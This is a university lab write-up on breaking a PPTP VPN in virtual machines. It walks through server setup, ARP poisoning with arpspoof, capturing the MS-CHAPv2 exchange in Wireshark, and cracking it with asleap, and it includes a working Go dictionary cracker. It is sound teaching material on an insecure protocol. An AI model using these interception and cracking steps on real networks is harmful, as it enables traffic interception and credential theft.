Project 10: Hacking a PPTP VPN with Asleap (25 pts.)

What You Need

Purpose

PPTP is an old VPN protocol that is known to be insecure. In its simplest form, PPTP authenticates users with MS-CHAPv2, a challenge-response exchange in which the response is computed from the password's NT hash, so anyone who captures a challenge and its response can test password guesses offline without ever talking to the server again.

Moxie Marlinspike has set up a cloud service that performs a complete brute-force attack to recover any password sent via MS-CHAPv2 for $200. However, we don't have $200 to spend, so we'll settle for a weaker attack using a dictionary of the top 10,000 passwords.

The point is clear--PPTP with MS-CHAPv2 is unsafe to use. Even an attacker with very modest means can steal passwords from it.

This project uses the following tools:

Task 1: Making a Windows Server 2008 PPTP VPN Server

Configuring Network Adapters

Power down the Windows 2008 server from the Start button.

Open Virtual Machine Settings and add a second Ethernet adapter.

In Virtual Machine Settings, configure Network Adapter 1 to use NAT and Network Adapter 2 to use a private Host-Only network, as shown below.

     

Start the Windows 2008 Server virtual machine and log in as Administrator with the password P@ssw0rd.

Troubleshooting

If you are using the Win 2008 I handed out in class, and your virtual machine cannot start, saying that no operating system was found, go into VMware settings and remove the 102 MB hard disk.

Click Start. Search for Network. Open "Network and Sharing Center".

Click "Manage Network Connections".

Right-click "Local Area Connection" and click Properties.

Double-click "Internet Protocol Version 4 (TCP/IP)".

Configure the adapter to "Obtain an IP address automatically" and "Obtain DNS server address automatically", as shown below.

Click OK. Click OK.

Right-click "Local Area Connection 2" and click Properties.

Double-click "Internet Protocol Version 4 (TCP/IP)".

Configure the adapter with these settings, as shown below. This is the server's address on the private Host-Only network; the rest of this project refers to the server as 10.0.0.1.

Click OK. Click OK.

Adding the Network Policy and Access Server Role

Click Start, "Administrative Tools", "Server Manager".

In Server Manager, in the right pane, scroll down to the "Roles Summary" section, as shown below, and click "Add Roles".

In the "Add Roles Wizard", click Next.

In the "Select Server Roles" page, check "Network Policy and Access Server", as shown below.

Click Next. Click Next.

In the "Select Role Services" page, check "Network Policy Server" and "Routing and Remote Access Services", as shown below.

Click Next. Click Install.

When you see an "Installation succeeded" message, as shown below, click Close.

Configuring Routing and Remote Access

In Server Manager, in the left pane, expand "Server Manager", expand Roles, and expand "Network Policy and Access Services".

Right-click "Routing and Remote Access" and click "Configure and Enable Routing and Remote Access", as shown below.

In the "Welcome to the Routing and Remote Access Server Setup Wizard" screen, click Next.

In the "Configuration" screen, click "Custom Configuration, as shown below, and click Next.

In the "Custom Configuration" screen, check "VPN access", as shown below, and click Next.

Click Finish.

In the message box that appears click "Start Service".

Configure a Policy to Allow VPN Connections

In Server Manager, in the left pane, right-click on "Remote Access Logging and Policies", as shown below, and click "Launch NPS".

In Network Policy Server, in the left pane, click "Network Policies".

In the right pane, near the top, right-click "Connections to Microsoft Routing and Remote Access server" policy and click Properties.

In the center of the "Connections to Microsoft Routing and Remote Access server Properties" sheet, click "Grant Access" as shown below.

Click OK.

Close the "Network Policy Server" window.

Enable IPv4 Packet Forwarding

In Server Manager, in the left pane, right-click "Routing and Remote Access" and click Properties, as shown below.

On the General tab, check the "IPv4 Router" box.

Make sure that "Local area network (LAN) routing only" is selected, as shown below.

Check the "IPv4 Remote access server" box, as shown below.

Click the IPv4 tab.

Check the "Enable IPv4 Forwarding" box, as shown below.

Click OK.

The changes you made require the "Routing and Remote Access" service to restart. Click Yes to restart it.

Activating NAT

In Server Manager, in the left pane, expand IPv4.

In the IPv4 section, right-click General, as shown below, and click "New Routing Protocol".

In the "New Routing Protocol" box, click NAT, as shown below.

Click OK.

In the left pane of Server Manager, in the IPv4 section, right-click NAT, and click "New Interface", as shown below.

In the "New Interface for IPNAT" box, click "Local Area Connection 2", the interface that connects to your private intranet, and then click OK, as shown below.

In "Local Area Connection 2 Properties", click "Private interface connected to private network", as shown below.

Then click OK, and click OK again.

Right-click NAT, and click "New Interface" again.

In the "New Interface for IPNAT" box, click "Local Area Connection", and then click OK,

In "Local Area Connection 2 Properties", click "Public interface connected to the Internet" and "Enable NAT on this interface", as shown below.

Then click OK.

Create the vpnuser Account

In Server Manager, in the left pane, expand Configuration, expand "Local Users and Groups", and click Users.

In the right pane, right-click an empty portion of the screen and click "New User", as shown below.

In the New User box, enter these values, as shown below: a user name of vpnuser and a password of Bond007.

NOTE: Use the exact password "Bond007". If you use some other password, the attack might fail because the password is not in the dictionary.

Click Create. Click Close.

Starting the Routing and Remote Access Server

In Server Manager, in the left pane, right-click "Routing and Remote Access" and click "All Tasks", Start, as shown below.

Configuring the Server to use MS-CHAPv2

MS-CHAPv2 without EAP is an insecure choice, but it is the easiest to set up, and it is exactly the configuration this attack targets.

In Server Manager, in the left pane, right-click "Routing and Remote Access" and click Properties.

In the "Routing and Remote Access Properties" sheet, click the "Authentication Methods" button.

In the "Authentication Methods" box, clear the "Extensible authentication protocol (EAP)" box, so that only "Microsoft encrypted authentication version 2 (MS-CHAP-v2)" is checked, as shown below.

Click OK. Click OK.

Task 2: Connecting from a Windows 7 Client

Start your Windows 7 virtual machine. Log in as usual.

In Virtual Machine Settings, configure its network adapter to use a private Host-Only network.

Click Start. Search for Network. Open "Network and Sharing Center".

Click "Change adapter settings".

Right-click "Local Area Connection" and click Properties.

Double-click "Internet Protocol Version 4 (TCP/IP)".

Configure the adapter with these settings, as shown below. This is the client's address on the private Host-Only network; the rest of this project refers to the Windows 7 client as 10.0.0.2.

Click OK. Click OK.

In the "Network Connections" window, in the top left, click the back arrow to return to "Network and Sharing Center".

In the center of the window, in the lower portion, click "Set up a new connection or network", as shown below.

In the "Choose a connection option" box, click "Connect to a workplace", as shown below. Click Next.

In the "Connect to a workplace" box, click "Use my Internet connection (VPN)", as shown below.

In the next box, click "I'll set up an Internet connection later".

In the "Type the Internet address to connect to" box, enter an Internet address of 10.0.0.1, as shown below. Then click Next.

In the "Type your user name and password" box, enter these values, as shown below.

Then click Create.

A message appears, saying "You are connected", as shown below.

Click Close.

Viewing the Connection on the Server

In the Windows Server 2008 machine, in Server Manager, in the left pane, click "Remote Access Clients".

In the right pane, you should see a connected machine, as shown below.

Saving a Screen Image

Make sure the connected client is visible, as shown above.

Click on the host system's desktop to make it active.

Press the PrintScrn key to copy the whole desktop to the clipboard.

YOU MUST SUBMIT A FULL-SCREEN IMAGE FOR FULL CREDIT!

Paste the image into Paint.

Save the document with the filename "YOUR NAME Proj 10a", replacing "YOUR NAME" with your real name.

Viewing the ARP Cache

On your Windows 7 virtual machine, click Start. Type in CMD.

In the Search results, right-click "Command Prompt" and click "Run as Administrator", as shown below.

If a "User Account Control" box pops up, click Yes.

In the Administrator Command Prompt window, execute this command:

arp -a

You should see an entry showing the Internet Address 10.0.0.1 corresponding to a Physical Address, as shown below.

Your Physical Address will be different from mine--it's your Windows Server 2008 machine.

Clearing the ARP Cache

On your Windows 7 machine, click Start. Search for Network. Open "Network and Sharing Center".

Click "Change adapter settings".

Right-click "VPN Connection" and click Disconnect.

In the Administrator Command Prompt window, execute these commands:

arp -d *

arp -a

The entry for 10.0.0.1 is gone, as shown below.

Task 3: Attacking from Kali

Downloading Chap2asleap and a Wordlist

Start Kali 2. Log in as usual. Connect to the Internet.

Execute these commands to download the hacking tool we need, and a list of the 10,000 most common passwords:

wget https://github.com/xiao106347/chap2asleap/raw/master/chap2asleap.py

curl https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/10k_most_common.txt > words.dat

head words.dat

You see the first 10 passwords, as shown below.

Troubleshooting

If those download links don't work, use these:
curl https://samsclass.info/124/proj14/chap2asleap.pyx > chap2asleap.py

wget https://samsclass.info/124/proj14/10k_most_common.txt

Adding Passwords with Initial Caps

These passwords contain no capital letters. To make a more realistic wordlist, we also need versions of them with an initial capital letter.

We'll do that with Bash commands, as you've done previously. First we'll work with only the first 10 words to develop the command, and then run it on the complete list.

Execute this command to select words that start with a letter:

head words.dat | grep "^[a-z].*"
The desired passwords appear, as shown below.

Execute this command to convert the first letters of those passwords to uppercase:

head words.dat | grep "^[a-z].*" | sed -r 's/([[:lower:]])/\U\1/'
The desired passwords appear, as shown below.

Execute these commands to put all the capitalized passwords into a file named Words.dat, and examine the files:

cat words.dat | grep "^[a-z].*" | sed -r 's/([[:lower:]])/\U\1/' > Words.dat

ls -l

The new file Words.dat is somewhat smaller than words.dat, because it excludes passwords that begin with a numeral, as shown below.

Execute these commands to put all the passwords in a file named allwords.dat, and examine the files. Use a single > rather than >> so that running the command twice does not append a second copy of the list:

cat words.dat Words.dat > allwords.dat

ls -l

The new file allwords.dat has a length equal to the sum of the two files "words.dat" and "Words.dat", as shown below.

Adjusting Kali's Networking

In Virtual Machine Settings, configure the Kali machine to use the private Host-only network, as shown below.

In Kali, in a Terminal window, execute these commands to assign an appropriate IP address to eth0 and test the networking:

ifconfig eth0 10.0.0.3/8

ping 10.0.0.1

You should see replies, as shown below. If you don't, make sure the Windows 2008 Server's firewall is off.

Press Ctrl+C to stop the pings.

Enabling Packet Forwarding on Kali

In Kali, in a Terminal window, execute this command to enable packet forwarding. If you don't do this, the man-in-the-middle attack below will prevent all networking and become a denial-of-service attack instead:

echo 1 > /proc/sys/net/ipv4/ip_forward

Start ARP Poisoning

In Kali, in a Terminal window, execute this command to send bogus ARP replies to the Windows 7 target, telling it that Kali's MAC address belongs to the VPN server. The -r option poisons the VPN server the same way, so traffic in both directions between 10.0.0.2 and 10.0.0.1 passes through the Kali machine:

arpspoof -i eth0 -t 10.0.0.2 -r 10.0.0.1

You see lines of text describing each packet, as shown below.

Leave this window open so the ARP replies continue to go out.

Examining the ARP Cache on the Windows 7 Machine

On your Windows 7 virtual machine, in the Administrator Command Prompt window, execute these commands:
ping 10.0.0.1

ping 10.0.0.3

arp -a

The Physical Address should be the same for both those IP addresses, as shown below.

This is incorrect, of course, and it shows that the ARP poisoning has worked and tricked the Windows 7 machine into sending its traffic to the wrong machine.

Saving a Screen Image

Make sure you can see two identical Physical Addresses for different IP Addresses, as shown above.

Click on the host system's desktop to make it active.

Press the PrintScrn key to copy the whole desktop to the clipboard.

YOU MUST SUBMIT A FULL-SCREEN IMAGE FOR FULL CREDIT!

Paste the image into Paint.

Save the document with the filename "YOUR NAME Proj 10b", replacing "YOUR NAME" with your real name.

Capturing a Challenge and Response with Wireshark

On Kali, open a new Terminal window and execute this command:
wireshark
A "Lua error" box appears. Click OK.

A box warns us that running as root is dangerous. We laugh at danger. Click OK.

In Wireshark, click eth0 and click Start.

In the Filter box, type:

chap
and press Enter.

The packet list should be empty, as shown below.

Preparing the Command

Now you need to build a long command. Open a text editor such as Notepad on your host system and paste in the following command:
python chap2asleap.py -u vpnuser -c CHALLENGE -r RESPONSE -x -p /usr/bin -d ./allwords.dat

This command tries every password in our "allwords.dat" dictionary against the CHALLENGE and RESPONSE strings we get from Wireshark. The -u option is needed because MS-CHAPv2 mixes the user name into the 8-byte challenge hash that asleap actually attacks: chap2asleap computes that hash from the user name, the peer challenge carried inside the response, and the server's challenge, and then hands it to asleap together with the 24-byte NT response.

At this point, your text editor should look like this:

Connecting to the VPN

On your Windows 7 machine, click Start. Search for Network. Open "Network and Sharing Center".

Click "Change adapter settings".

Right-click "VPN Connection" and click Connect.

A box pops up. Click Connect.

Getting the Challenge and Response from Wireshark

On Kali, the Wireshark window now shows some CHAP packets, as shown below.

Click the red square icon to stop the packet capture.

In the top pane of Wireshark, click a Challenge packet.

In the middle pane, expand PPP. Expand Data. Click on Value to highlight it, as shown below.

Right-click on Value and click Copy, Bytes, "Hex Stream", as shown below.

On your host system, in the text editor, paste that hex stream in the place of CHALLENGE.

Your text editor should now resemble this image:

In the top pane of Wireshark, click a Response packet.

In the middle pane, click on Value. Right-click on Value and click Copy, Bytes, "Hex Stream", as shown below.

On your host system, in the text editor, paste that hex stream in the place of RESPONSE.

Your text editor should now resemble this image:

Running the Attack

Copy the whole command from your text editor and paste it into a Terminal window in Kali.

The attack should succeed immediately, finding the password, as shown below.

Notice how fast it was--this took only 0.06 seconds. We could easily use a much larger dictionary to make the attack even more powerful.
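The steps above treat chap2asleap and asleap as black boxes. The Go program below is an added example written for this page, not code from the project or from the asleap or chap2asleap authors; it reimplements what they do so you can see why a captured challenge and response are enough to recover the password. It computes the NT hash (MD4 of the UTF-16LE password, implemented here because Go's standard library has no MD4), the RFC 2759 challenge hash that chap2asleap derives from the peer challenge, the server's challenge and the user name (which is why -u is required), and the three-DES-key NT response, then runs the same dictionary attack, trying each word as-is and with an initial capital exactly as the Words.dat step does. Go was chosen because its standard library includes DES and SHA-1. The function names, the fixed challenge bytes and the short wordlist in main are all constructed for this example; to use it on a real capture, pass the two Wireshark hex streams (the 16-byte Challenge Value and the 49-byte Response Value) to crack() in place of the fabricated ones.

```go
package main

import (
	"bytes"
	"crypto/des"
	"crypto/sha1"
	"encoding/binary"
	"encoding/hex"
	"fmt"
	"math/bits"
	"strings"
	"unicode/utf16"
)

// md4 implements RFC 1320 (Go's standard library has no MD4); an NT hash is MD4 of the UTF-16LE password.
func md4(data []byte) [16]byte {
	a, b, c, d := uint32(0x67452301), uint32(0xefcdab89), uint32(0x98badcfe), uint32(0x10325476)
	msg := append(append([]byte{}, data...), 0x80)
	msg = append(msg, make([]byte, (119-len(data)%64)%64+8)...) // zeros to 56 mod 64, then 8 length bytes
	binary.LittleEndian.PutUint64(msg[len(msg)-8:], uint64(len(data))*8)
	s1, s2, s3 := []int{3, 7, 11, 19}, []int{3, 5, 9, 13}, []int{3, 9, 11, 15}
	k3 := []int{0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15}
	for off := 0; off < len(msg); off += 64 {
		var x [16]uint32
		for i := range x { x[i] = binary.LittleEndian.Uint32(msg[off+4*i:]) }
		aa, bb, cc, dd := a, b, c, d
		for i := 0; i < 16; i++ { // round 1: F(b,c,d) = (b AND c) OR (NOT b AND d), words in order
			a, b, c, d = d, bits.RotateLeft32(a+((b&c)|(^b&d))+x[i], s1[i%4]), b, c
		}
		for i := 0; i < 16; i++ { // round 2: G = majority(b,c,d), words 0,4,8,12,1,5,9,13,...
			a, b, c, d = d, bits.RotateLeft32(a+((b&c)|(b&d)|(c&d))+x[(i%4)*4+i/4]+0x5a827999, s2[i%4]), b, c
		}
		for i := 0; i < 16; i++ { // round 3: H = b XOR c XOR d, words 0,8,4,12,2,10,...
			a, b, c, d = d, bits.RotateLeft32(a+(b^c^d)+x[k3[i]]+0x6ed9eba1, s3[i%4]), b, c
		}
		a, b, c, d = a+aa, b+bb, c+cc, d+dd
	}
	var out [16]byte
	for i, v := range []uint32{a, b, c, d} { binary.LittleEndian.PutUint32(out[4*i:], v) }
	return out
}

func ntHash(password string) [16]byte { // what the server stores; asleap recomputes it per dictionary word
	var buf []byte
	for _, u := range utf16.Encode([]rune(password)) {
		buf = append(buf, byte(u), byte(u>>8))
	}
	return md4(buf)
}

// challengeHash (RFC 2759) = SHA1(PeerChallenge || AuthenticatorChallenge || UserName)[:8]: the 8-byte
// "challenge" chap2asleap derives for asleap; mixing in the user name is why -u is a required option.
func challengeHash(peer, auth []byte, username string) []byte {
	h := sha1.New()
	h.Write(append(append(append([]byte{}, peer...), auth...), username...))
	return h.Sum(nil)[:8]
}

// ntResponse (RFC 2759 ChallengeResponse): the NT hash, zero-padded to 21 bytes, becomes three 7-byte DES
// keys that each encrypt the same challenge hash. Only the password is secret, so guesses can be checked offline.
func ntResponse(chal []byte, nt [16]byte) []byte {
	padded := make([]byte, 21)
	copy(padded, nt[:])
	resp := make([]byte, 24)
	for i := 0; i < 3; i++ {
		k := padded[7*i : 7*i+7] // spread 7 key bytes over 8; the low bit of each byte is a parity bit DES ignores
		key := []byte{k[0] & 0xfe, k[0]<<7 | k[1]>>1, k[1]<<6 | k[2]>>2, k[2]<<5 | k[3]>>3,
			k[3]<<4 | k[4]>>4, k[4]<<3 | k[5]>>5, k[5]<<2 | k[6]>>6, k[6] << 1}
		block, _ := des.NewCipher(key) // key is always 8 bytes, so NewCipher cannot fail
		block.Encrypt(resp[8*i:], chal)
	}
	return resp
}

// crack replays asleap's dictionary attack on two Wireshark hex streams: the 16-byte CHAP Challenge Value and
// the 49-byte CHAP Response Value (PeerChallenge 16 | Reserved 8 | NT-Response 24 | Flags 1). Every word is
// tried as-is and with an initial capital, which is what the Words.dat step adds to the wordlist.
func crack(username, authHex, respHex string, words []string) (string, error) {
	auth, _ := hex.DecodeString(authHex)
	resp, _ := hex.DecodeString(respHex)
	if len(auth) != 16 || len(resp) != 49 {
		return "", fmt.Errorf("want 16-byte challenge and 49-byte response values, got %d and %d", len(auth), len(resp))
	}
	chal := challengeHash(resp[:16], auth, username)
	for _, w := range words {
		if w == "" { continue }
		for _, cand := range []string{w, strings.ToUpper(w[:1]) + w[1:]} {
			if bytes.Equal(ntResponse(chal, ntHash(cand)), resp[24:48]) {
				return cand, nil
			}
		}
	}
	return "", fmt.Errorf("password not in wordlist")
}

func main() {
	auth, peer := make([]byte, 16), make([]byte, 16)
	for i := range auth {
		auth[i], peer[i] = byte(i), byte(0xa0+i) // constructed fixed challenges for vpnuser/Bond007, not a capture
	}
	nt := ntResponse(challengeHash(peer, auth, "vpnuser"), ntHash("Bond007"))
	value := append(append(append(append(make([]byte, 0, 49), peer...), make([]byte, 8)...), nt...), 0)
	fmt.Println(crack("vpnuser", hex.EncodeToString(auth), hex.EncodeToString(value), []string{"123456", "password", "bond007"}))
}
```

Running it prints "Bond007 <nil>": the lowercase "bond007" from the list only matches after the initial-capital variant is tried, which is the reason the Words.dat step exists. A wrong user name makes every candidate fail, because the user name changes the challenge hash, so copy it exactly as the client sent it (without any domain prefix).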

Saving a Screen Image

Make sure the password of Bond007 message is visible, as shown above.

Click on the host system's desktop to make it active.

Press the PrintScrn key to copy the whole desktop to the clipboard.

YOU MUST SUBMIT A FULL-SCREEN IMAGE FOR FULL CREDIT!

Paste the image into Paint.

Save the document with the filename "YOUR NAME Proj 10c", replacing "YOUR NAME" with your real name.

Turning in your Project

Email the image to cnit.124@gmail.com with the subject line: Proj 10 from YOUR NAME

Sources

Hacking PPTP VPNs with ASLEAP (from 2009)

Hacking PPTP VPN With Backtrack (from 2012)

How to setup a VPN Server in Windows Server 2008

VPN error 812: The connection was prevented because of a policy configured on your RAS/VPN server

Internet Access through VPN server - need help please

How to enable IP Forwarding


Last revised 10-19-17 7:49 pm